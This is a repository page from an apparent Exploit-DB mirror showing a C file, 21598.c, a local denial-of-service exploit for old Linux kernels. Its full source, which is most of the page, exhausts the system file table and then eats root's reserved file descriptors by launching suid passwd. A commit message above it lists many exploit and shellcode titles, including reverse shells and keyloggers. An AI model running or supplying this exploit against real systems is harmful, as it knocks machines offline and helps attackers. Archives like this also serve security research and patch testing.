bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux/dos/21598.c
Offensive Security 2a57bee5c6 DB: 2016-07-25 
12 new exploits

Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Exploit
Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Privilege Escalation Exploit

Linux Kernel < 2.6.31-rc4 - nfs4_proc_lock() Denial of Service

FreeBSD/x86 - /bin/cat /etc/master.passwd NULL free shellcode (65 bytes)
FreeBSD/x86 - /bin/cat /etc/master.passwd Null Free Shellcode (65 bytes)

Linux/x86 - execve shellcode null byte free (Generator)
Linux/x86 - execve Null Free shellcode (Generator)

Linux/x86 - cmd shellcode null free (Generator)
Linux/x86 - cmd Null Free shellcode (Generator)

iOS - Version-independent shellcode

Linux/x86-64 - bindshell port:4444 shellcode (132 bytes)
Linux/x86-64 - bindshell port 4444 shellcode (132 bytes)

Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) NULL Free shellcode (39 bytes)
Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null Free shellcode (39 bytes)

Windows 5.0 < 7.0 x86 - null-free bindshell shellcode
Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 shellcode

Win32 - telnetbind by Winexec shellcode (111 bytes)
Win32 - telnetbind by Winexec 23 port shellcode (111 bytes)

Windows NT/2000/XP - add user _slim_ shellcode for Russian systems (318 bytes)
Windows NT/2000/XP (Russian) - Add User _slim_ Shellcode (318 bytes)
Windows XP Pro SP2 English - _Message-Box_ Shellcode Null-Free (16 bytes)
Windows XP Pro SP2 English - _Wordpad_ Shellcode Null Free (12 bytes)
Windows XP Pro SP2 English - _Message-Box_ Null Free Shellcode (16 bytes)
Windows XP Pro SP2 English - _Wordpad_ Null Free Shellcode (12 bytes)

Linux/x86 - /bin/sh Null-Free Polymorphic Shellcode (46 bytes)
Linux/x86 - /bin/sh Polymorphic Null Free Shellcode (46 bytes)

Win32 - Add new local administrator shellcode _secuid0_ (326 bytes)
Win32 - Add New Local Administrator _secuid0_ Shellcode (326 bytes)

ARM - Bindshell port 0x1337shellcode
ARM - Bindshell port 0x1337 shellcode

Linux Kernel <= 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite

Linux Kernel <= 2.4.0 - Stack Infoleaks

bsd/x86 - connect back Shellcode (81 bytes)
FreeBSD/x86 - connect back Shellcode (81 bytes)

Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.10/11.04) - Privilege Boundary Crossing Local Root Exploit
Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Privilege Boundary Crossing Local Root Exploit

Linux Kernel 2.0 / 2.1 - SIGIO
Linux Kernel 2.0 / 2.1 - Send a SIGIO Signal To Any Process

Linux Kernel 2.2 - 'ldd core' Force Reboot

Debian 2.1_ Linux Kernel 2.0.x_ RedHat 5.2 - Packet Length with Options
Linux Kernel 2.0.x (Debian 2.1 / RedHat 5.2) - Packet Length with Options

Linux Kernel 2.2.x - Non-Readable File Ptrace
Linux Kernel 2.2.x - Non-Readable File Ptrace Local Information Leak

OS X 10.x_ FreeBSD 4.x_OpenBSD 2.x_Solaris 2.5/2.6/7.0/8 exec C Library Standard I/O File Descriptor Closure
OS X 10.x_ FreeBSD 4.x_ OpenBSD 2.x_ Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure

Linux Kernel 2.4.18/19 - Privileged File Descriptor Resource Exhaustion
Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking (1)
Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking (2)
Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Local Root Exploit (1)
Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Local Root Exploit (2)

Linux Kernel 2.4 - suid execve() System Call Race Condition PoC
Linux Kernel 2.4 - suid execve() System Call Race Condition Executable File Read Proof of Concept

Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling
Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Memory Read

Linux Kernel <= 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure

Microsoft Internet Explorer 6.0_ Firefox 0.x_Netscape 7.x - IMG Tag Multiple Vulnerabilities
Microsoft Internet Explorer 6.0 / Firefox 0.x / Netscape 7.x - IMG Tag Multiple Vulnerabilities

Linux Kernel 2.4.x / 2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities

Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1)

Linux/x86 - Reverse TCP Bind Shellcode (92 bytes)
Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes)

Linux Kernel 2.2.x / 2.3.x / 2.4.x / 2.5.x / 2.6.x - ELF Core Dump Local Buffer Overflow

Linux/x86-64 - Bind TCP port shellcode (81 bytes / 96 bytes with password)
Linux/x86-64 - Bind TCP 4444 Port Shellcode (81 bytes / 96 bytes with password)

Linux/x86 - TCP Bind Shel shellcode l (96 bytes)
Linux/x86 - TCP Bind Shell 33333 Port Shellcode (96 bytes)

Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'rootpipe' Privilege Escalation
Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation

Windows x86 - user32!MessageBox _Hello World!_ Null-Free shellcode (199 bytes)
Windows x86 - user32!MessageBox _Hello World!_ Null Free Shellcode (199 bytes)

OS-X/x86-64 - /bin/sh Shellcode NULL Byte Free (34 bytes)
OS-X/x86-64 - /bin/sh Null Free Shellcode (34 bytes)

Mainframe/System Z - Bind Shell shellcode (2488 bytes)
Mainframe/System Z - Bind Shell Port 12345 Shellcode (2488 bytes)

OS-X/x86-64 - tcp bind shellcode_ NULL byte free (144 bytes)
OS-X/x86-64 - tcp 4444 port bind Nullfree shellcode (144 bytes)

Ubuntu Apport - Local Privilege Escalation
Apport 2.19 (Ubuntu 15.04) - Local Privilege Escalation

Linux/x86-64 - Bindshell with Password shellcode (92 bytes)
Linux/x86-64 - Bindshell 31173 port with Password shellcode (92 bytes)

Windows XP < 10 - Null-Free WinExec Shellcode (Python) (Generator)
Windows XP < 10 - WinExec Null Free Shellcode (Python) (Generator)
Linux/x86-64 - bind TCP port shellcode (103 bytes)
Linux/x86-64 - TCP Bindshell with Password Prompt shellcode (162 bytes)
Linux/x86-64 - Bind TCP 4444 Port Shellcode (103 bytes)
Linux/x86-64 - TCP 4444 port Bindshell with Password Prompt shellcode (162 bytes)

Windows x86 - Null-Free Download & Run via WebDAV Shellcode (96 bytes)
Windows x86 - Download & Run via WebDAV Null Free Shellcode (96 bytes)

Linux Kernel 3.10_ 3.18 + 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption
Linux Kernel 3.10 / 3.18 / 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption

Windows - Null-Free Shellcode Primitive Keylogger to File (431 (0x01AF) bytes)
Windows - Primitive Keylogger to File Null Free Shellcode (431 (0x01AF) bytes)

Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (/etc/shadow)
Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (Access /etc/shadow)

Windows - Null-Free Shellcode Functional Keylogger to File (601 (0x0259) bytes)
Windows - Functional Keylogger to File Null Free Shellcode  (601 (0x0259) bytes)

Linux/x86-64 - Null-Free Reverse TCP Shell shellcode (134 bytes)
Linux/x86-64 - Reverse TCP Shell Null Free Shellcode (134 bytes)

Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon (83_ 148_ 177 bytes)
Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode (83_ 148_ 177 bytes)

Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal (84_ 122_ 172 bytes)
Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal Shellcode (84_ 122_ 172 bytes)
2016-07-25 05:06:19 +00:00

276 lines
3 KiB
C
Executable file
Raw Blame History

/*
source: http://www.securityfocus.com/bid/5178/info
The Linux kernel is a freely available, open source kernel originally written by Linus Torvalds. It is the core of all Linux distributions.
Recent versions of the Linux kernel include a collection of file descriptors which are reserved for usage by processes executing as the root user. By default, the size of this collection is set to 10 file descriptors.
It is possible for a local, non-privileged user to open all system file descriptors. The malicious user may then exhaust the pool of reserved descriptors by opening several common suid binaries, resulting in a denial of service condition.
*/
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <fcntl.h>
#include <errno.h>
#define PREFORK 1
#define EXECBIN "/usr/bin/passwd"
#define FREENUM 18
static int fc = 0;
static int ec = 0;
void forkmore(int v)
{
fc++;
}
void execmore(int v)
{
ec++;
}
int main()
{
int r, cn, pt[PREFORK];
signal(SIGUSR1, &forkmore);
signal(SIGUSR2, &execmore);
printf("\n");
for (cn = 0; cn < PREFORK; cn++) {
if (!(r = fork())) {
printf("\npreforked child %d", cn);
fflush(stdout);
while (!ec) {
usleep(100000);
}
printf("\nexecuting %s\n", EXECBIN);
fflush(stdout);
execl(EXECBIN, EXECBIN, NULL);
printf("\nwhat the fuck?");
fflush(stdout);
while (1)
sleep(999999);
exit(1);
} else
pt[cn] = r;
}
sleep(1);
printf("\n\n");
fflush(stdout);
cn = 0;
while (1) {
fc = ec = 0;
cn++;
if (!(r = fork())) {
int cnt = 0, fd = 0, ofd = 0;
while (1) {
ofd = fd;
fd = open("/dev/null", O_RDWR);
if (fd < 0) {
printf("errno %d ", errno);
printf("pid %d got %d files\n", getpid(), cnt);
fflush(stdout);
if (errno == ENFILE)
kill(getppid(), SIGUSR2);
else
kill(getppid(), SIGUSR1);
break;
} else
cnt++;
}
ec = 0;
while (1) {
usleep(100000);
if (ec) {
printf("\nfreeing some file descriptors...\n");
fflush(stdout);
for (cn = 0; cn < FREENUM; cn++) {
printf("\n pid %d closing %d", getpid(), ofd);
close(ofd--);
}
ec = 0;
kill(getppid(), SIGUSR2);
}
}
} else {
while (!ec && !fc)
usleep(100000);
if (ec) {
printf("\n\nfile limit reached, eating some root's fd");
fflush(stdout);
sleep(1);
ec = 0;
kill(r, SIGUSR2);
while (!ec)
sleep(1);
for (cn = 0; cn < PREFORK; cn++)
kill(pt[cn], SIGUSR2);
while (1) {
sleep(999999);
}
}
}
}
return 0;
}
Reference in a new issue View git blame Copy permalink